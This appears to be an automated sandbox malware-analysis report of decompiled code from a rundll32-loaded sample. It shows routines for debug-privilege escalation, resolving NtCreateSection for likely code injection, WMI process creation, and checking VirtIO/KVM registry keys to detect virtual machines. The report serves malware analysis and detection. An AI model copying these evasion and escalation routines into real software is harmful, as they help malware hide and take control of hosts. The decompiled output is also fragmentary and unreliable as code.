                                        			E000001C31C338730790(void* __ebx, void* __ecx, char __esi, void* __rax, void* __rdx, long long __rdi, void* __r8, void* __r9, long long __r14, long long _a8, char _a16, char _a24, signed long long _a40, long long _a48, long long _a104, intOrPtr _a128) {
				signed long long _v0;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed int _t48;
				void* _t72;
				char _t73;
				void* _t74;
				signed long long _t88;
				signed long long _t89;
				void* _t91;
				void* _t98;
				char* _t107;
				signed int* _t111;
				signed long long _t117;
				void* _t119;
				void* _t120;
				void* _t121;
				char* _t131;
				void* _t136;

				_t73 = __esi;
				E000001C31C33880C220();
				_t88 =  *0x38903000; // 0x9bfaf736ae76
				_t89 = _t88 ^ _t121 - __rax;
				_a40 = _t89;
				_t119 = __ecx;
				_t91 = __r9;
				_t136 = __r8;
				_t120 = __rdx;
				if (__ecx > 0) goto 0x387307c9;
				goto 0x387309f6;
				_a48 = __r14;
				E000001C31C338724390(__esi, __r9);
				E000001C31C3387311E0(_t89, _t89);
				_t107 = "Called capi_rsa_priv_dec()\n";
				E000001C31C33872D790(_t89, _t107, __r8, __r9);
				E000001C31C33873F920(__ecx, _t89, _t91, _t91, __ecx, __rdx);
				if (_t89 != 0) goto 0x38730845;
				if ( *0x38909020 != 0) goto 0x3873081e;
				 *0x38909020 = E000001C31C338721CE0(_t89);
				_v0 = 0x3a3;
				_t4 = _t107 - 9; // 0x65
				r8d = _t4;
				E000001C31C3387222D0(_t35, 0x6e,  *0x38909020, _t89, _t91, _t91, _t107, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0x387309f1;
				r9d = _a128;
				if (r9d == 1) goto 0x387308bb;
				E000001C31C338726420(_t89,  &_a24, _t107, 0x38845258, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				if ( *0x38909020 != 0) goto 0x3873087e;
				 *0x38909020 = E000001C31C338721CE0(_t89);
				_v0 = 0x3aa;
				_t8 = _t107 + 0xa; // 0x78
				r8d = _t8;
				E000001C31C3387222D0(_t40, 0x6e,  *0x38909020, _t89, _t91,  &_a24, _t107, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C338721640(2, _t89, "padding=",  &_a24, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0x387309f1;
				r8d = 0x3b0;
				_a104 = __rdi;
				_t109 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				_t98 = _t119;
				E000001C31C338725700();
				_t117 = _t89;
				if (_t89 != 0) goto 0x3873091c;
				if ( *0x38909020 != 0) goto 0x387308f5;
				 *0x38909020 = E000001C31C338721CE0(_t89);
				_v0 = 0x3b1;
				_t131 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				_t12 = _t109 - 0x2d; // 0x41
				r8d = _t12;
				E000001C31C3387222D0(_t45, 0x6e,  *0x38909020, _t89, _t91, _t98, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t119, _t120, _t131);
				goto 0x387309e9;
				if (_t73 <= 0) goto 0x38730942;
				_t111 = _t119 - 1 + _t117;
				_t48 =  *(_t98 + _t120) & 0x000000ff;
				 *_t111 = _t48;
				_t112 = _t111 - 1;
				if (_t98 + 1 - _t119 < 0) goto 0x38730930;
				r9d = 0;
				_a16 = _t73;
				_a8 =  &_a16;
				_v0 = _t117;
				_t21 = _t131 + 1; // 0x1
				r8d = _t21;
				__imp__CryptDecrypt();
				if (_t48 != 0) goto 0x387309bf;
				if ( *0x38909020 != 0) goto 0x38730981;
				 *0x38909020 = E000001C31C338721CE0( &_a16);
				_v0 = 0x3ba;
				_t23 = _t112 - 5; // 0x69
				r8d = _t23;
				E000001C31C3387222D0(_t50, 0x6e,  *0x38909020,  &_a16, _t91,  *((intOrPtr*)(_t89 + 0x10)), _t111 - 1, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C33872DA10( *0x38909020,  &_a16, _t111 - 1);
				r8d = 0x3bc;
				E000001C31C338725750();
				goto 0x387309e9;
				E000001C31C33880DC90(_t50, _t72, _t73, _t74, _t136, _t117, _t117, _t119, _a16);
				r8d = 0x3c1;
				E000001C31C338725750();
				E000001C31C33880C290();
				return __ebx;
			}























                                        0x1c338730790
                                        0x1c33873079b
                                        0x1c3387307a3
                                        0x1c3387307aa
                                        0x1c3387307ad
                                        0x1c3387307b2
                                        0x1c3387307b5
                                        0x1c3387307b8
                                        0x1c3387307bb
                                        0x1c3387307c0
                                        0x1c3387307c4
                                        0x1c3387307cc
                                        0x1c3387307d1
                                        0x1c3387307df
                                        0x1c3387307e4
                                        0x1c3387307ee
                                        0x1c3387307fc
                                        0x1c338730807
                                        0x1c338730811
                                        0x1c338730818
                                        0x1c338730823
                                        0x1c338730834
                                        0x1c338730834
                                        0x1c338730838
                                        0x1c338730840
                                        0x1c338730845
                                        0x1c338730851
                                        0x1c338730864
                                        0x1c338730871
                                        0x1c338730878
                                        0x1c338730883
                                        0x1c338730894
                                        0x1c338730894
                                        0x1c338730898
                                        0x1c3387308ae
                                        0x1c3387308b6
                                        0x1c3387308bb
                                        0x1c3387308c1
                                        0x1c3387308c9
                                        0x1c3387308d0
                                        0x1c3387308d3
                                        0x1c3387308d8
                                        0x1c3387308de
                                        0x1c3387308e8
                                        0x1c3387308ef
                                        0x1c3387308fa
                                        0x1c338730902
                                        0x1c33873090b
                                        0x1c33873090b
                                        0x1c33873090f
                                        0x1c338730917
                                        0x1c338730920
                                        0x1c338730926
                                        0x1c338730930
                                        0x1c338730937
                                        0x1c338730939
                                        0x1c338730940
                                        0x1c338730942
                                        0x1c338730945
                                        0x1c338730952
                                        0x1c338730959
                                        0x1c33873095e
                                        0x1c33873095e
                                        0x1c338730962
                                        0x1c33873096a
                                        0x1c338730974
                                        0x1c33873097b
                                        0x1c338730986
                                        0x1c338730997
                                        0x1c338730997
                                        0x1c33873099b
                                        0x1c3387309a0
                                        0x1c3387309a5
                                        0x1c3387309b5
                                        0x1c3387309bd
                                        0x1c3387309cd
                                        0x1c3387309d2
                                        0x1c3387309e2
                                        0x1c3387309fe
                                        0x1c338730a0c

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Called capi_rsa_priv_dec()$padding=
                                        • API String ID: 0-3671336825
                                        • Opcode ID: f2e44db5cb2352129625bcebb1a276bec3d738dedd622a7a7a070fede8a05b0c
                                        • Instruction ID: 6c19f3ee7dd3feb8c5e663a6d23311a2263c6a7ee37bb2bae6c26ac7651fb4ad
                                        • Opcode Fuzzy Hash: f2e44db5cb2352129625bcebb1a276bec3d738dedd622a7a7a070fede8a05b0c
                                        • Instruction Fuzzy Hash: 9C61A0723817C086F620DB25E804FDA77A6B744B90F50E213ADA987796DB78C744CB83
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33872E660 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCrypt$CertCertificateDestroyFreeRelease
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                        • API String ID: 1168903292-3997076816
                                        • Opcode ID: 495a82722c32e399db1cc8026540f08409f35216fe110391c0baaf5cbd506f3b
                                        • Instruction ID: 8714086566b335092785e42d1d36a6ef6cef0c70274b216e98f04d06ed563a00
                                        • Opcode Fuzzy Hash: 495a82722c32e399db1cc8026540f08409f35216fe110391c0baaf5cbd506f3b
                                        • Instruction Fuzzy Hash: 180136367916C086FB54EB11E854B996362FB89B80F54E022DD290B796DE38C6948702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338730700 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCrypt$CertCertificateDestroyFreeRelease
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                        • API String ID: 1168903292-3997076816
                                        • Opcode ID: bf1e1f54ba9f360e09a85b4cf164ce169f3335bc883477a9e6037b130202e7cc
                                        • Instruction ID: 8cb46dd93116de50d71fe7177c1c1944da29babb52b7bed20fa93e3fc4830266
                                        • Opcode Fuzzy Hash: bf1e1f54ba9f360e09a85b4cf164ce169f3335bc883477a9e6037b130202e7cc
                                        • Instruction Fuzzy Hash: 9501A97A3417C082FB54EB21E854FD92362FB98BC0F49E0229D290B796DE3CC6818743
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871C805 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 176memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Variant$Clear$String$_com_issue_error$FreeInit$Alloc
                                        • String ID: CreateFlags$ProcessId$ProcessStartupInformation$ReturnValue$ShowWindow
                                        • API String ID: 2067041508-2207766347
                                        • Opcode ID: 928b80573e51ff3e9ef2be97ae4f12264b351f62580b05883e0d2c2687bf9381
                                        • Instruction ID: d28032081ea4a56850e43b570d3d4dbbff06023a4140c2f14a62c637fde380c6
                                        • Opcode Fuzzy Hash: 928b80573e51ff3e9ef2be97ae4f12264b351f62580b05883e0d2c2687bf9381
                                        • Instruction Fuzzy Hash: 00811536240B84C6EB10DF69E89479D77B0FB88B98F409516EE5E87B68DF38C648C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33872A2A0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 167registryfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 61%
                                        			E000001C31C33872A2A0() {
				void* _t42;
				void* _t51;
				intOrPtr _t52;
				void* _t58;
				void* _t64;
				void* _t65;
				void* _t78;
				signed long long _t79;
				signed long long _t80;
				char* _t84;
				signed long long _t85;
				long long _t86;
				long long _t96;
				signed long long _t99;
				int _t103;
				long long _t106;
				int _t107;
				void* _t108;
				signed long long _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				long long _t113;
				signed long long _t115;
				long long _t116;
				void* _t120;
				void* _t121;
				long _t122;

				 *((long long*)(_t110 + 8)) = _t86;
				 *((long long*)(_t110 + 0x10)) = _t96;
				 *((long long*)(_t110 + 0x18)) = _t113;
				 *((long long*)(_t110 + 0x20)) = _t116;
				E000001C31C33880C220();
				_t111 = _t110 - _t78;
				_t109 = _t111 + 0x50;
				_t79 =  *0x38903000; // 0x9bfaf736ae76
				_t80 = _t79 ^ _t109;
				 *(_t109 + 0x210) = _t80;
				GetStdHandle(_t122);
				_t85 = _t80;
				if (_t80 == 0) goto 0x3872a362;
				if (GetFileType(_t121) == 0) goto 0x3872a362;
				E000001C31C33871E120(_t39);
				 *((long long*)(_t111 + 0x28)) = _t109 + 0x268;
				 *(_t111 + 0x20) = _t107;
				r8d = 0x200;
				_t42 =  <  ? 0xffffffff : E000001C31C338816A8C(_t51, 0xfffffff4, _t58, 0x200, _t64, _t65, _t85,  *_t80 | 0x00000001, _t109 + 0x10, _t107, _t113,  *((intOrPtr*)(_t109 + 0x260)));
				if (_t42 < 0) goto 0x3872a344;
				 *(_t111 + 0x20) = _t107;
				r8d = _t42;
				WriteFile(_t108, ??, ??, ??);
				goto 0x3872a52c;
				_t52 = E000001C31C33872A5B0( *((intOrPtr*)(_t109 + 0x260))) + 1;
				_t15 = _t80 + _t80 + 0xf; // 0x10
				if (_t15 - _t80 + _t80 > 0) goto 0x3872a38b;
				E000001C31C33880C220();
				_t112 = _t111 - 0xfffffff0;
				if (_t112 + 0x50 != 0) goto 0x3872a3b2;
				_t106 = L"no stack?";
				goto 0x3872a47a;
				 *((intOrPtr*)(_t112 + 0x28)) = _t52;
				r9d = _t52;
				 *((long long*)(_t112 + 0x20)) = _t106;
				if (MultiByteToWideChar(_t103, _t107, _t84) != 0) goto 0x3872a3f7;
				_t99 = _t107;
				if (_t85 == 0) goto 0x3872a3f7;
				 *((short*)(_t106 + _t99 * 2)) =  *((char*)(_t99 +  *((intOrPtr*)(_t109 + 0x260))));
				if (_t99 + 1 - _t85 < 0) goto 0x3872a3e0;
				_t115 = _t107;
				if (_t85 == 0) goto 0x3872a47a;
				r10d = 0x53;
				r11d = _t120 + 0x20;
				r14d = _t120 - 0x10;
				r15d = _t120 + 0x10;
				if ( *((short*)(_t106 + _t115 * 2)) != 0x25) goto 0x3872a472;
				if (( *(_t106 + 2 + _t115 * 2) & 0x0000ffff) + 0xffffffd6 - 0x49 > 0) goto 0x3872a472;
				goto __rcx;
			}































                                        0x1c33872a2a0
                                        0x1c33872a2a5
                                        0x1c33872a2aa
                                        0x1c33872a2af
                                        0x1c33872a2c1
                                        0x1c33872a2c6
                                        0x1c33872a2c9
                                        0x1c33872a2ce
                                        0x1c33872a2d5
                                        0x1c33872a2d8
                                        0x1c33872a2e4
                                        0x1c33872a2ea
                                        0x1c33872a2f0
                                        0x1c33872a2fd
                                        0x1c33872a306
                                        0x1c33872a316
                                        0x1c33872a322
                                        0x1c33872a32a
                                        0x1c33872a33b
                                        0x1c33872a340
                                        0x1c33872a348
                                        0x1c33872a34d
                                        0x1c33872a357
                                        0x1c33872a35d
                                        0x1c33872a373
                                        0x1c33872a378
                                        0x1c33872a37f
                                        0x1c33872a392
                                        0x1c33872a397
                                        0x1c33872a3a4
                                        0x1c33872a3a6
                                        0x1c33872a3ad
                                        0x1c33872a3b2
                                        0x1c33872a3b6
                                        0x1c33872a3bb
                                        0x1c33872a3ca
                                        0x1c33872a3cc
                                        0x1c33872a3d2
                                        0x1c33872a3eb
                                        0x1c33872a3f5
                                        0x1c33872a3f7
                                        0x1c33872a3fd
                                        0x1c33872a3ff
                                        0x1c33872a40c
                                        0x1c33872a410
                                        0x1c33872a414
                                        0x1c33872a41e
                                        0x1c33872a439
                                        0x1c33872a451

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite_invalid_parameter_noinfo
                                        • String ID: OpenSSL$OpenSSL: FATAL$no stack?
                                        • API String ID: 3447168048-278800372
                                        • Opcode ID: 327d4abda4e7108db4f5c15a324cbebe442dd0e14d6fedb6e28765cb1fe8b8f8
                                        • Instruction ID: d8ee0f4dbb4f0bcf208d5e3d54759f5b85dc940457f69cd70a3cda8993db6374
                                        • Opcode Fuzzy Hash: 327d4abda4e7108db4f5c15a324cbebe442dd0e14d6fedb6e28765cb1fe8b8f8
                                        • Instruction Fuzzy Hash: A961E073240BC096FB208F24E844BD9B3A5F744B94F54A626EE6A4BB95DF38C351C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338717D40 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 57libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressCloseHandleProc$CurrentLibraryLoadLookupPrivilegeProcessValue
                                        • String ID: AdjustTokenPrivileges$Advapi32.dll$OpenProcessToken$SeDebugPrivilege
                                        • API String ID: 1752774111-261832459
                                        • Opcode ID: f01c3b2a8d190324c0af41496456fbaa1b763869f9e634f14ab8525a95459cf4
                                        • Instruction ID: 18300f01d5d88b80ad5079e934d5b6500ac20100f31064abb624615c88ec13fc
                                        • Opcode Fuzzy Hash: f01c3b2a8d190324c0af41496456fbaa1b763869f9e634f14ab8525a95459cf4
                                        • Instruction Fuzzy Hash: D7213272615B8082EB40CF55F8546DAB3A0F788794F409027DDAA87B28EF78C658CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871BAE0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 96libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 27%
                                        			E000001C31C33871BAE0(intOrPtr __ecx, long long* __rax, long long __rbx, long long* __rdx, long long __rdi, long long __rsi, long long* __r8, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				intOrPtr _v64;
				long long _v72;
				long long _v80;
				intOrPtr _v88;
				void* _v96;
				long long _v104;
				long long _v120;
				intOrPtr _v128;
				intOrPtr _v136;
				void* __rbp;
				intOrPtr _t38;
				void* _t43;
				void* _t54;
				intOrPtr _t55;
				void* _t57;
				long long* _t63;
				void* _t89;
				long long* _t98;
				long long* _t99;

				_t86 = __rsi;
				_t64 = __rbx;
				_t63 = __rax;
				_t49 = __ecx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t99 = __r8;
				_t98 = __rdx;
				_a32 = __rbx;
				_t55 = __ecx;
				_v96 = __rbx;
				_v88 = 0;
				_t7 = _t64 + 0x28; // 0x28
				r8d = _t7;
				E000001C31C33880E410(__ecx, 0, _t54, _t57,  &_v80, __rdx, __rdi, __r8);
				_v104 = __rbx;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				_v104 = _t55;
				_v88 = 0x30;
				_v120 = __rsi;
				asm("xorps xmm0, xmm0");
				_v128 = 0x8000000;
				_v80 = __rsi;
				_t17 = _t86 + 0x40; // 0x40
				_t38 = _t17;
				_v72 = __rsi;
				_v64 = _t38;
				_v136 = _t38;
				asm("movdqu [ebp-0x10], xmm0");
				if ( *_t63() < 0) goto 0x3871bbfe;
				GetCurrentProcess();
				if (E000001C31C33871B9B0(_t63, _t63, _a32, _t63, _t89,  &_v96) != 0) goto 0x3871bc05;
				r8d = _v104;
				E000001C31C33880E410(_t49, 0, _t54, _t57, _v96, _t63, _t63,  &_v96);
				 *_t98 = _v96;
				if (_t99 == 0) goto 0x3871bc05;
				 *_t99 = _a32;
				goto 0x3871bc09;
				_t43 =  *_t63();
				if (_a32 == 0) goto 0x3871bc16;
				if (_t99 != 0) goto 0x3871bc16;
				 *_t63();
				return _t43;
			}























                                        0x1c33871bae0
                                        0x1c33871bae0
                                        0x1c33871bae0
                                        0x1c33871bae0
                                        0x1c33871bae0
                                        0x1c33871bae5
                                        0x1c33871baea
                                        0x1c33871bb04
                                        0x1c33871bb07
                                        0x1c33871bb0a
                                        0x1c33871bb0e
                                        0x1c33871bb10
                                        0x1c33871bb16
                                        0x1c33871bb19
                                        0x1c33871bb19
                                        0x1c33871bb21
                                        0x1c33871bb2d
                                        0x1c33871bb31
                                        0x1c33871bb44
                                        0x1c33871bb57
                                        0x1c33871bb6a
                                        0x1c33871bb70
                                        0x1c33871bb79
                                        0x1c33871bb83
                                        0x1c33871bb88
                                        0x1c33871bb8b
                                        0x1c33871bb97
                                        0x1c33871bb9b
                                        0x1c33871bb9b
                                        0x1c33871bb9e
                                        0x1c33871bba7
                                        0x1c33871bbae
                                        0x1c33871bbb2
                                        0x1c33871bbbb
                                        0x1c33871bbbd
                                        0x1c33871bbd7
                                        0x1c33871bbd9
                                        0x1c33871bbe3
                                        0x1c33871bbec
                                        0x1c33871bbf3
                                        0x1c33871bbf9
                                        0x1c33871bbfc
                                        0x1c33871bc00
                                        0x1c33871bc0c
                                        0x1c33871bc11
                                        0x1c33871bc13
                                        0x1c33871bc38

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$CurrentProcess
                                        • String ID: 0$NtCreateSection$RtlNtStatusToDosError$ZwClose$ntdll.dll
                                        • API String ID: 1077269151-3111467594
                                        • Opcode ID: 8efdbcc87b961bce842ecd1f6197e8cd36daaac88b2062f1e09bf8dfbb529105
                                        • Instruction ID: 6f800c8370ae2320755a0628ab5b72db65ce0720f9ba3753013a1c62299358ac
                                        • Opcode Fuzzy Hash: 8efdbcc87b961bce842ecd1f6197e8cd36daaac88b2062f1e09bf8dfbb529105
                                        • Instruction Fuzzy Hash: 52415C32751B508AFB10CF66E844ADD37B5F788B98F149126EE5A97B08EF34C685C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338820430 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 84COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 59%
                                        			E000001C31C338820430(struct _IO_FILE* __rbx, long long __rcx, long long __rdx, void* __rdi, void* __rsi, long __r14) {
				intOrPtr _t33;
				int _t40;
				void* _t41;
				void* _t51;
				void* _t53;
				signed long long _t60;
				signed long long _t61;
				signed long long _t63;
				long long _t84;
				void* _t87;
				void* _t89;
				signed long long _t90;

				_t90 = _t89 - 0x4f0;
				_t60 =  *0x38903000; // 0x9bfaf736ae76
				_t61 = _t60 ^ _t90;
				 *(_t89 - 0x3f0 + 0x3e0) = _t61;
				_t84 = __rcx;
				 *((long long*)(_t90 + 0x40)) = __rcx;
				 *((long long*)(_t90 + 0x58)) = __rdx;
				r14d = r8d;
				 *((intOrPtr*)(_t90 + 0x38)) = r8d;
				GetStdHandle(__r14);
				_t6 = _t61 - 1; // -1
				if (_t6 - 0xfffffffd > 0) goto 0x388204f9;
				if (GetFileType(__rdi) != 2) goto 0x388204f9;
				 *((intOrPtr*)(_t90 + 0x28)) = r14d;
				 *((long long*)(_t90 + 0x20)) = __rdx;
				_t33 = E000001C31C338820670(_t41, 0xfffffff4, 0x240, _t51, _t53, GetFileType(__rdi) - 2, _t61, _t90 + 0x60, __rdx, L"Assertion failed: %Ts, file %Ts, line %d\n", __rcx, __rsi);
				if (_t33 < 0) goto 0x388204f9;
				_t63 = (_t61 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t90 + 0x60 + _t63 * 2)) != 0) goto 0x388204c7;
				_t95 = _t90 + 0x30;
				 *((intOrPtr*)(_t90 + 0x30)) = 0;
				r8d = _t33;
				 *((long long*)(_t90 + 0x20)) = _t84;
				if (WriteConsoleW(_t87, ??, ??, ??) == 0) goto 0x388204f9;
				abort();
				asm("int3");
				E000001C31C33881768C(2, _t63);
				if (( *(_t63 + 0x14) & 0x000004c0) != 0) goto 0x38820529;
				E000001C31C33881768C(2, _t63);
				r9d = 0;
				_t20 = _t95 + 4; // 0x4
				r8d = _t20;
				E000001C31C33882C8E4(0, _t63, _t61, _t63, _t90 + 0x60, _t90 + 0x30);
				L2();
				 *(_t90 + 0x48) = _t63;
				E000001C31C33881768C(2, _t63);
				 *(_t90 + 0x50) = _t63;
				 *((long long*)(_t90 + 0x20)) = _t90 + 0x38;
				L1();
				E000001C31C33881768C(2, _t90 + 0x38);
				_t40 = fflush(__rbx);
				abort();
				asm("int3");
				asm("int3");
				r10d =  *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x28))));
				 *((intOrPtr*)(_t90 + 0x28)) = r10d;
				goto 0x3882062c;
				asm("int3");
				asm("int3");
				return _t40;
			}















                                        0x1c33882043f
                                        0x1c338820446
                                        0x1c33882044d
                                        0x1c338820450
                                        0x1c338820457
                                        0x1c33882045a
                                        0x1c338820464
                                        0x1c338820469
                                        0x1c33882046c
                                        0x1c338820474
                                        0x1c33882047d
                                        0x1c338820485
                                        0x1c338820493
                                        0x1c338820495
                                        0x1c3388204a4
                                        0x1c3388204b3
                                        0x1c3388204bc
                                        0x1c3388204c7
                                        0x1c3388204ce
                                        0x1c3388204d0
                                        0x1c3388204d5
                                        0x1c3388204d9
                                        0x1c3388204dc
                                        0x1c3388204f1
                                        0x1c3388204f3
                                        0x1c3388204f8
                                        0x1c3388204fe
                                        0x1c33882050c
                                        0x1c338820513
                                        0x1c338820518
                                        0x1c338820520
                                        0x1c338820520
                                        0x1c338820524
                                        0x1c33882052b
                                        0x1c338820535
                                        0x1c33882053a
                                        0x1c33882053f
                                        0x1c338820553
                                        0x1c338820562
                                        0x1c33882056c
                                        0x1c338820574
                                        0x1c338820579
                                        0x1c33882057e
                                        0x1c33882057f
                                        0x1c33882058e
                                        0x1c338820594
                                        0x1c338820599
                                        0x1c33882059e
                                        0x1c33882059f
                                        0x1c3388205a7

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: abort$ConsoleFileHandleTypeWritefflushswprintf
                                        • String ID: Assertion failed: %Ts, file %Ts, line %d$Z:\hooker2\Common\md5.cpp$nLength % 4 == 0
                                        • API String ID: 1760031326-1349988364
                                        • Opcode ID: 069c7830e6e6b571874dd099d804a634adff7791f68b9f21957c8a256731c135
                                        • Instruction ID: bc8d90eed77dee528562e27ae49ddc6498a3e2f40bf318c3ca6d64eb3ac62130
                                        • Opcode Fuzzy Hash: 069c7830e6e6b571874dd099d804a634adff7791f68b9f21957c8a256731c135
                                        • Instruction Fuzzy Hash: 88317272294AC082F714EB65E815BDA73A4F7847A4F50A217EE794BBD9DF38C6048701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338720250 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 61registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 21%
                                        			E000001C31C338720250(long long __rbx, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				signed long long _v24;
				char _v536;
				long long _v544;
				long long _v552;
				long long _v560;
				long long _v568;
				long long _v576;
				long long _v584;
				long long _v592;
				char _v600;
				long long _v616;
				void* __rdi;
				void* _t30;
				void* _t33;
				void* _t35;
				signed long long _t39;
				void* _t58;
				void* _t60;
				void* _t64;
				void* _t67;

				_a8 = __rbx;
				_a16 = __rsi;
				_t39 =  *0x38903000; // 0x9bfaf736ae76
				_v24 = _t39 ^ _t64 - 0x00000280;
				_v592 = L"SYSTEM\\ControlSet001\\Services\\vioscsi";
				_v584 = L"SYSTEM\\ControlSet001\\Services\\viostor";
				_v576 = L"SYSTEM\\ControlSet001\\Services\\VirtIO-FS Service";
				_v568 = L"SYSTEM\\ControlSet001\\Services\\VirtioSerial";
				_v560 = L"SYSTEM\\ControlSet001\\Services\\BALLOON";
				_v552 = L"SYSTEM\\ControlSet001\\Services\\BalloonService";
				_v544 = L"SYSTEM\\ControlSet001\\Services\\netkvm";
				r8d = 0x200;
				E000001C31C33880E410(_t30, 0, _t33, _t35,  &_v536, _t58, _t60, _t67);
				0x3871e130();
				_v600 = __rsi;
				r9d = 0x20019;
				_v616 =  &_v600;
				r8d = 0;
				if (RegOpenKeyExW(??, ??, ??, ??, ??) == 0) goto 0x38720339;
				if (__rbx + 1 - 7 < 0) goto 0x387202d0;
				goto 0x38720349;
				RegCloseKey(??);
				E000001C31C33880C290();
				return 1;
			}
























                                        0x1c338720250
                                        0x1c338720255
                                        0x1c338720262
                                        0x1c33872026c
                                        0x1c33872027d
                                        0x1c33872028b
                                        0x1c338720297
                                        0x1c3387202a3
                                        0x1c3387202af
                                        0x1c3387202bb
                                        0x1c3387202c7
                                        0x1c3387202d7
                                        0x1c3387202dd
                                        0x1c3387202fb
                                        0x1c338720305
                                        0x1c33872030a
                                        0x1c338720310
                                        0x1c338720315
                                        0x1c33872032a
                                        0x1c338720333
                                        0x1c338720337
                                        0x1c33872033e
                                        0x1c338720354
                                        0x1c33872036d

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen
